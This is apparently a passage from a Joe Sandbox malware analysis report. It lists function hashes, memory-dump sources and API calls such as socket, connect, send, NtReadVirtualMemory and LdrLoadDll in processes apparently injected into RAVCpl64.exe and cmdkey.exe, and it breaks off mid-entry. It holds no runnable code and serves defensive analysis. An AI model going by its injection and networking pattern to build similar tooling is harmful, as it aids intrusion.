Instruction Fuzzy Hash: 64F0C274A00208EFDB04EF69C515E6EB7F4FF28304F00806AB811EB394DA34EA00CB50

Function 0154F247 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae91e1c510a2bdcb0b52449e8f518ea4131c75dabde02f5949941548cec071d6
Instruction ID: 5954c47e21a8f8a742d3c3ba564e3dee3531166cc03a64ef9aa3c86ae7c7e76f
Opcode Fuzzy Hash: ae91e1c510a2bdcb0b52449e8f518ea4131c75dabde02f5949941548cec071d6
Instruction Fuzzy Hash: 36F06275A00248EFDB04DFADD815E5EB7F4BF28304F00446AA511EB291E674D900CB54

Function 0149471B Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bb4ee1fd02ea8f95338fa6ecfe182c7d2267e3c5f04fa3bb2ce89b90040fa71
Instruction ID: 131eb13336ecf37d2728837c7e8b34071c0186919836578b2741b1fc1bb964a7
Opcode Fuzzy Hash: 2bb4ee1fd02ea8f95338fa6ecfe182c7d2267e3c5f04fa3bb2ce89b90040fa71
Instruction Fuzzy Hash: 01F024B150529C9EEF32832CC204B7B7FC89B43660F0C48E7C5298B632D330D886C251

Function 014CC50D Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4551a8c76b4c1cea72240df2aff50870956f43ac054469c3ec17bfdafb6edda7
Instruction ID: d6d970c0d988ba1bde38527ebe9a2a2629ed4678430f32f9e446828317135762
Opcode Fuzzy Hash: 4551a8c76b4c1cea72240df2aff50870956f43ac054469c3ec17bfdafb6edda7
Instruction Fuzzy Hash: CEF052B94112B0DBE3A2935CC0C8B637BD89B25E64F09802FC40E87332C330C880C2C0

Function 014D2539 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
Instruction ID: 121a4442c82c350c9182fd4e5d7edd147df1c985e7f7accc95312d7266a5eec6
Opcode Fuzzy Hash: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
Instruction Fuzzy Hash: AAE092323405416BEB119E5A8CE4F577B9EDFE2710F45447EB9045F261C9F29D0982A0

Function 014C7128 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34d8a6ae053a424f70dafea2887b78c37f20a5183fbe43e8bf0eb9ab45542747
Instruction ID: 323aac0b896b4f3e552160466405c790810fbf53b697a90efc0257d92ecc71cd
Opcode Fuzzy Hash: 34d8a6ae053a424f70dafea2887b78c37f20a5183fbe43e8bf0eb9ab45542747
Instruction Fuzzy Hash: CAF0E2319116919FDB23D3A9C044B9977D8BB44A71F099065D6198BA92C330DCC0C690

Function 0156505B Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1df4e9315533c19f3ffbd066cc2a54f55a1520f6898ce5661a19073bcbc73da0
Instruction ID: af8910b629e7057748fad5b5393ad2ada66f65a2b2c2f6e25b5616033d4d282c
Opcode Fuzzy Hash: 1df4e9315533c19f3ffbd066cc2a54f55a1520f6898ce5661a19073bcbc73da0
Instruction Fuzzy Hash: 9AF0E270A00209ABDB04EBB9D815E5EB7F8AF28304F00049DE501EF294EA74D9008758

Function 0154F2AE Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca65e4f5ef0e5b01b547e5eebd3a5e60d0fddfce09c910bbb697d669ef42e0b6
Instruction ID: 3d054d452d32cf2acbc1c08d2b1924eaa664d05616f8cb200ad7d86df13ed689
Opcode Fuzzy Hash: ca65e4f5ef0e5b01b547e5eebd3a5e60d0fddfce09c910bbb697d669ef42e0b6
Instruction Fuzzy Hash: F7F08271A00249ABDB04DBADD86AF5EB7F8EF28708F54049AE601EF290D974D900C718

Function 0154F717 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bb496bcc157698bd9bc6eadc28dbd3160be10a4669e8d203f5f5b74fe604fb9
Instruction ID: 20c34d9a868b92343d6429bd83348d2f7b218d6a27d6ef81a526492379c729c0
Opcode Fuzzy Hash: 6bb496bcc157698bd9bc6eadc28dbd3160be10a4669e8d203f5f5b74fe604fb9
Instruction Fuzzy Hash: 57F08275A00248ABDB04DBADD959E5EB7F8AF28708F44049AE601EF294D974D9008758

Function 0154F7CF Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 368af1a236543a61769a3aa81e9891e99435014655d8f10cd8a370ac41f5f668
Instruction ID: 155ad28b08a9298a5b822c22782431f3c88d020b463f1a667752b210920a49a6
Opcode Fuzzy Hash: 368af1a236543a61769a3aa81e9891e99435014655d8f10cd8a370ac41f5f668
Instruction Fuzzy Hash: A5F08271A00248AFDB04DBADD559E5EB7F8AF28708F45049AE501FF294E974D9008718

Function 014C174A Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52a66256076ec550f30d0775385d0d2ff1f444dc30e22b8225848ac4ab208bde
Instruction ID: 4c47c2837e9a3f0add1086b69ed8fd1bee60c59c3aa8ee163858edab854cb063
Opcode Fuzzy Hash: 52a66256076ec550f30d0775385d0d2ff1f444dc30e22b8225848ac4ab208bde
Instruction Fuzzy Hash: B7E09272602822ABE2619E59EC00F67739DEBF4A50F0A447AE904DB224D638DD06C7E0

Function 014C54E0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 369f009082050829a275a7bbe12d1f068ebee6e8ca6735a7f0af70988af87659
Instruction ID: 175806b800288adc274772f074b549cc5bf420d5328d8ec4e77585233fa6beed
Opcode Fuzzy Hash: 369f009082050829a275a7bbe12d1f068ebee6e8ca6735a7f0af70988af87659
Instruction Fuzzy Hash: 7FE0E532240611ABC7221A0ECC00F16FB58FFA0B71F05822EE5184B1E0C670F802CAD4

Function 01563336 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0008614389e4c6b7c8f3a5444dc37d698eba2a91f3b45f08bbf5d080c4fc888
Instruction ID: 9f2e812b629861648f1ed9621925fbab529dcf2f41f3b00b234ca06713afd2c9
Opcode Fuzzy Hash: c0008614389e4c6b7c8f3a5444dc37d698eba2a91f3b45f08bbf5d080c4fc888
Instruction Fuzzy Hash: A6E06D72210200BBE765DB49CD01FAA77ACFB24720F140259B125971E0DAB0FE40C6A4

Function 01492500 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b2f54458ffd506af1f1c2fcd9a2902bafb2db29b3312e37a8a53b91655e485b6
Instruction ID: 8fdab3dc870858195df366398e528693dfc8477b71a76ea39acabffbac74df25
Opcode Fuzzy Hash: b2f54458ffd506af1f1c2fcd9a2902bafb2db29b3312e37a8a53b91655e485b6
Instruction Fuzzy Hash: E6E09232100954ABC721BB2ADD11F9ABB9AEF74364F01411AF126571B1CA70A910C7C4

Function 014881EB Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
Instruction ID: a819a775aa84635a5bfda82ae8479b00d52b141212e10ce8b918c20da77a44b6
Opcode Fuzzy Hash: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
Instruction Fuzzy Hash: 37E0C231050523EFDB323F25DC00F56B6A2FF24B10F21046FF486062B28FB49882DA49

Function 0148B502 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
Instruction ID: bb8b78052123b5885a47b35fc9ac1346adf60c523b9dc3b324acd8cef465ec31
Opcode Fuzzy Hash: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
Instruction Fuzzy Hash: 71D05E32051620AED7323F16ED05F97BAB6EF60F15F05052EB105169F1C6B1ED85C6A4

Function 0150E588 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
Instruction ID: 4bdf704edd9577ff63c2433d8d70735999ebf52998451b975439a8e3605a7ef4
Opcode Fuzzy Hash: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
Instruction Fuzzy Hash: FBE0EC359506849FDF13DF9AC641F5EBBF6FB95B00F290858A5086F6B1E635E900CB40

Function 014CE4BC Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
Instruction ID: 250e153e3eed844d96dba0da70a7ad17fda63690be7f701073bdded2edf262e1
Opcode Fuzzy Hash: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
Instruction Fuzzy Hash: 47D0A972204610ABC732AA1CFC00FC373E9BBA8B21F02045AB018CB0A2C364EC81C680

Function 0148A093 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
Instruction ID: cde85f51b44899d7654559a7916cc661382dce6a6a6a53e9a8c67a3ff8bd7a5d
Opcode Fuzzy Hash: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
Instruction Fuzzy Hash: 12D0223220203093CB383E456910F6BB905AB92A50F2A002F380A83920C0208C83C2E0

Function 014CA750 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
Instruction ID: a10985e2c8464157ce67be483b62428b29a35c308b26c49b5ceeabd5da7ecadf
Opcode Fuzzy Hash: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
Instruction Fuzzy Hash: B4D022370D010CBBCB119F62CC01F907BA9E7B4B60F004020B504870A0CA3AE850C580

Function 014A01C0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
Instruction ID: 54310069dcfa91c0a5e3aaddc183c49d6863df661817d0f2bcd56d189992557a
Opcode Fuzzy Hash: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
Instruction Fuzzy Hash: F4D0C935312D80CFD61BCB0CC894B0633A4BB44B40FC50490E901CB722D63CE944CA00

Function 014B0230 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction ID: 27e471e72265c96a4cc5853b44f9905b919879217acdab5ad480be8c93d94dbe
Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction Fuzzy Hash: D7D0123610024CEFCB05DF41C890D9A773AFFD8710F108019FD19076208A31ED62DA50

Function 014B332D Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
Instruction ID: 5fb3ef023cdf578afd9de67dc8c03f14b9f90c700ceda379319be80b150aa17d
Opcode Fuzzy Hash: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
Instruction Fuzzy Hash: B3C08C701422806AEB2B5F4AC950B2B3A54BB24E05F84119DAA101D6B2C77AE8018218

Function 014C7550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01504460
CLIENT(ntdll): Processing section info %ws..., xrefs: 01504592
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0150454D
Execute=1, xrefs: 0150451E
ExecuteOptions, xrefs: 015044AB
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01504530
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01504507

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 798fe20357bfb658b4218b0b5e409b6f42d2f0188252f32d288b1bce7a475ba9
Instruction ID: df6985d946198aca2349e6e09a1ce544bf1ba4e91e50a9d279f7d761d51cd04e
Opcode Fuzzy Hash: 798fe20357bfb658b4218b0b5e409b6f42d2f0188252f32d288b1bce7a475ba9
Instruction Fuzzy Hash: 5E514B3560020A6BEF619BA9DC95FFE77A8FF24B11F0404AFDA05AB1A0D7709A418F50

Function 01499046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 014990B1
@, xrefs: 01499095

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 0c14ce373f86dad0ef21be795a47213be73800c4f467e33568806c13e1ad74a6
Instruction ID: 35605e166d937dbc2a84d44765b5a267b2662510fd48a368e37f635286597f65
Opcode Fuzzy Hash: 0c14ce373f86dad0ef21be795a47213be73800c4f467e33568806c13e1ad74a6
Instruction Fuzzy Hash: B0812DB1D002699BDB35CF54CC45BEEBAB8AB04714F0041EBEA19B7260D7709E85CFA1

Analysis Process: RAVCpl64.exePID: 5320, Parent PID: 8564COMMON

Execution Graph

Execution Coverage:	4.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	24
Total number of Limit Nodes:	2

Executed Functions

Function 0085D933 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$, xrefs: 0085D99B

Memory Dump Source

Source File: 00000003.00000002.111783922720.0000000000830000.00000040.80000000.00040000.00000000.sdmp, Offset: 00830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_830000_RAVCpl64.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: d1dec6e9141cc035298547e73bb2619bd33a22ec2689c1bd68a02d31e780b081
Instruction ID: d0b41e2618e5e315b8fda90327e437f054c333ca6bb6e06cd504b06b5b49ce6d
Opcode Fuzzy Hash: d1dec6e9141cc035298547e73bb2619bd33a22ec2689c1bd68a02d31e780b081
Instruction Fuzzy Hash: 4431173221C7848FD729DF28D4852E6BBD0FB86365F44456DDC89CB146EA21994ACB82

Function 0085D148 Relevance: 1.6, APIs: 1, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNELBASE ref: 0085D213

Memory Dump Source

Source File: 00000003.00000002.111783922720.0000000000830000.00000040.80000000.00040000.00000000.sdmp, Offset: 00830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_830000_RAVCpl64.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 9460f4a1c1ff0539f577e19df47fc42e70f6334bcbcbd849ac8eeb51ddd0c703
Instruction ID: 42a39eed4875f23a52860b7eddf6e1e9fbfca8014a0d5551657760177a1be178
Opcode Fuzzy Hash: 9460f4a1c1ff0539f577e19df47fc42e70f6334bcbcbd849ac8eeb51ddd0c703
Instruction Fuzzy Hash: 163181B151CB488FCB29DF48D8C16A973E0FB85712F50065EEC8AC7146DA30E9468B97

Function 0085E611 Relevance: 1.6, APIs: 1, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNELBASE ref: 0085E660

Memory Dump Source

Source File: 00000003.00000002.111783922720.0000000000830000.00000040.80000000.00040000.00000000.sdmp, Offset: 00830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_830000_RAVCpl64.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1e686263ae5ff24f28254933dd1bbfa1eb0d8607f8ba1d348c97e1b39488b58e
Instruction ID: c639c71ffb8516c1f8b7fb68c03d9eb91d3cfc8b8eaa94ad55d8cdf4270ad2b5
Opcode Fuzzy Hash: 1e686263ae5ff24f28254933dd1bbfa1eb0d8607f8ba1d348c97e1b39488b58e
Instruction Fuzzy Hash: 4411B730624B4C8FDB59DF2C898166977D1FB69743F85057EEC4EC7146CA288949CF82

Function 008664CD Relevance: 1.6, APIs: 1, Instructions: 69
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 00866566

Memory Dump Source

Source File: 00000003.00000002.111783922720.0000000000830000.00000040.80000000.00040000.00000000.sdmp, Offset: 00830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_830000_RAVCpl64.jbxd

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 3dc9b3007c24e835c65bc7612e8289aa187a6333d46985b56a91fcaf7d771d86
Instruction ID: 2b4d3cdc21dfbe2bc392999d46417cbf9d64a2b20799b8ea3b50214e246b4818
Opcode Fuzzy Hash: 3dc9b3007c24e835c65bc7612e8289aa187a6333d46985b56a91fcaf7d771d86
Instruction Fuzzy Hash: 8E116D3091CA448FCB59EF2C908975AB7E1FB98305F04457EE84DCB25ADF30A954C796

Function 00866581 Relevance: 1.6, APIs: 1, Instructions: 69
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 0086660E

Memory Dump Source

Source File: 00000003.00000002.111783922720.0000000000830000.00000040.80000000.00040000.00000000.sdmp, Offset: 00830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_830000_RAVCpl64.jbxd

Similarity

API ID: connect
String ID:
API String ID: 1959786783-0
Opcode ID: 0d62d1153e45468b71e70fdd066f74eb37b41703b4862684bebacac6908ab5c2
Instruction ID: 06131ec5075dfe7bc8e019fbee90829f9b7e9776324c57d31a34c66c3c9340b6
Opcode Fuzzy Hash: 0d62d1153e45468b71e70fdd066f74eb37b41703b4862684bebacac6908ab5c2
Instruction Fuzzy Hash: 5D11513091CB448FCB48EF1CA0896597BE1FB68305F1405BEE85DCB29ADE708544CB96

Function 00866393 Relevance: 1.6, APIs: 1, Instructions: 62
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 0086641B

Memory Dump Source

Source File: 00000003.00000002.111783922720.0000000000830000.00000040.80000000.00040000.00000000.sdmp, Offset: 00830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_830000_RAVCpl64.jbxd

Similarity

API ID: socket
String ID:
API String ID: 98920635-0
Opcode ID: 4c8304888f106bd23edaaa5377d2660d43cfff841e34aecb59c0366b384d3539
Instruction ID: 94e94a265e716a4cdc12c4b0e7f4e55e6769d317765f4eb73c96fb89570c4f3d
Opcode Fuzzy Hash: 4c8304888f106bd23edaaa5377d2660d43cfff841e34aecb59c0366b384d3539
Instruction Fuzzy Hash: 7911607091CB448FCB49EF28908865ABBE0FF5C300F0405BEE94DCB24BDA709944CB9A

Function 00867A28 Relevance: 1.6, APIs: 1, Instructions: 53
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL ref: 00867AA1

Memory Dump Source

Source File: 00000003.00000002.111783922720.0000000000830000.00000040.80000000.00040000.00000000.sdmp, Offset: 00830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_830000_RAVCpl64.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: ae54d5f5e8390d96b5b79a241ef8240e47e29c0e6253ce2343724ff47f6c6f88
Instruction ID: f934bc59b54df4bc5b3c6218063854a32eef9c91bff2c2e5bcbd445ab86303cc
Opcode Fuzzy Hash: ae54d5f5e8390d96b5b79a241ef8240e47e29c0e6253ce2343724ff47f6c6f88
Instruction Fuzzy Hash: F001D631618B484BD714EB78C8C96ABB3E5FFE8315F05052EA88EC3150EA35D644CB83

Function 00866639 Relevance: 1.5, APIs: 1, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

closesocket.WS2_32 ref: 008666AC

Memory Dump Source

Source File: 00000003.00000002.111783922720.0000000000830000.00000040.80000000.00040000.00000000.sdmp, Offset: 00830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_830000_RAVCpl64.jbxd

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: b636557fc2d7cc4acae0ecc8430ddb0bfa6badad7cf4952ca0ecfde0d21f3007
Instruction ID: 17b15155cf07460a437f195e9de3e02350a5f68bb13da729001cfe01ce69b14c
Opcode Fuzzy Hash: b636557fc2d7cc4acae0ecc8430ddb0bfa6badad7cf4952ca0ecfde0d21f3007
Instruction Fuzzy Hash: CF015E3051CB489FDB85EF28C0887AABBE1FBA8304F44457EF98DC7255DB3481448716

Non-executed Functions

Function 008594E8 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.111783922720.0000000000830000.00000040.80000000.00040000.00000000.sdmp, Offset: 00830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_830000_RAVCpl64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9b4e4b2b01bee36056087eca73a3f9ce30517edb6ad3d5b373e79f3998a49d3
Instruction ID: c5cc498ef654080d8df5bbc523eb694373032a9d413a3d00143a7b62792b57ac
Opcode Fuzzy Hash: a9b4e4b2b01bee36056087eca73a3f9ce30517edb6ad3d5b373e79f3998a49d3
Instruction Fuzzy Hash: FC41D57051CF0D8FC728EF6C9081676B3E2FB95311F51052DD99AC3252EB75E84A8786

Analysis Process: cmdkey.exePID: 9064, Parent PID: 5320COMMON

Execution Graph

Execution Coverage:	0.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	11
Total number of Limit Nodes:	1

Executed Functions

Function 039BEF38 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 541
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL ref: 039BF0E7
NtReadVirtualMemory.NTDLL ref: 039BF1EF

Strings

0, xrefs: 039BF15B
vTd;, xrefs: 039BF104

Memory Dump Source

Source File: 00000004.00000002.110845526801.00000000039B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 039B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39b0000_cmdkey.jbxd

Similarity

API ID: InformationMemoryProcessQueryReadVirtual
String ID: 0$vTd;
API String ID: 1498878907-344068449
Opcode ID: 2deb738232a90cf013e171ff241047587262a987c3884ba519dfaefcf981df23
Instruction ID: 376319971d5ca3553b1f9168bc2186f38c84af43387aca185d87b62542265656
